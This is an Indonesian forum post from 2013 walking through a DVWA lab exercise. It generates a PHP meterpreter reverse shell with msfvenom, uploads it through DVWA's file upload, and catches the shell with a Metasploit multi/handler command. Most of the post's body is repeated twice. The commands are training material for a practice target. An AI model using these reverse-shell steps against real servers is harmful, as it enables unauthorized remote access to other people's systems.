07-27-2013, 11:27 PM
Selamat Melaksanakan Ibadah puasa bagi teman-teman pencinta IT indonesia dan sahabat-sahabat saya di
indonesian backtrack team,codernate,dan IT-Manado/Indifinetech.....!!!
Penulis kali ini akan memberikan sedikit ilmu rooting webserver kali linux dengan memanfaatkan metasploit
untuk membuat shell php,disini penulis sengaja menggunkan web yang sudah vulnerability DVWA (Damn
Vulnerable Web Application) dan web application ini bisa didownload di http://www.dvwa.co.uk/
Kita buat dulu php sheelnya
LHOST= IP komputer anda
Lport= port target
Desktop/premankali.php = sheelnya bernama premankali.php terletak di Desktop.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.114.177.215 LPORT=81 -f raw >
Desktop/premankali.php
Edit premankali.php dengan text editor kesayangan anda disini penulis menggunakan leafpad lebih ringan dan
cepat,penulis juga sudah mencoba menggunakan gedit tapi responnya lama banget...so gedit is't recommended.
Tambahkan tag pembuka dan penutup php di awal script dan akhir script
?>
karena default saat kita membuat php sheel tidak terdapat tag pembuka dan penutupnya.
Jalankan localhosnya ->Application-->Kali Linux-->System Service-->HTTP-->apache2 start
mysql Application-->Kali Linux-->System Service-->HTTP-->Mysql start
Buka Web Application DVWA di browser 127.0.0.1/dvwa
Username = admin
Password = password
Setup create database
upload premankali.php
premankali.php masuk ke dir dvwa/hackable/uploads
Sekarang kita komunikasikan premankali.php dengan metasploit
msfcli exploit/multi/handler LHOST=10.114.177.215 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
ketika premankali.php dieksekusi target maka dengan otomatis membuka meterpreter
indonesian backtrack team,codernate,dan IT-Manado/Indifinetech.....!!!
Penulis kali ini akan memberikan sedikit ilmu rooting webserver kali linux dengan memanfaatkan metasploit
untuk membuat shell php,disini penulis sengaja menggunkan web yang sudah vulnerability DVWA (Damn
Vulnerable Web Application) dan web application ini bisa didownload di http://www.dvwa.co.uk/
Kita buat dulu php sheelnya
LHOST= IP komputer anda
Lport= port target
Desktop/premankali.php = sheelnya bernama premankali.php terletak di Desktop.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.114.177.215 LPORT=81 -f raw >
Desktop/premankali.php
Edit premankali.php dengan text editor kesayangan anda disini penulis menggunakan leafpad lebih ringan dan
cepat,penulis juga sudah mencoba menggunakan gedit tapi responnya lama banget...so gedit is't recommended.
Tambahkan tag pembuka dan penutup php di awal script dan akhir script
?>
karena default saat kita membuat php sheel tidak terdapat tag pembuka dan penutupnya.
Jalankan localhosnya ->Application-->Kali Linux-->System Service-->HTTP-->apache2 start
mysql Application-->Kali Linux-->System Service-->HTTP-->Mysql start
Buka Web Application DVWA di browser 127.0.0.1/dvwa
Username = admin
Password = password
Setup create database
upload premankali.php
premankali.php masuk ke dir dvwa/hackable/uploads
Sekarang kita komunikasikan premankali.php dengan metasploit
msfcli exploit/multi/handler LHOST=10.114.177.215 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
ketika premankali.php dieksekusi target maka dengan otomatis membuka meterpreter
The Wolf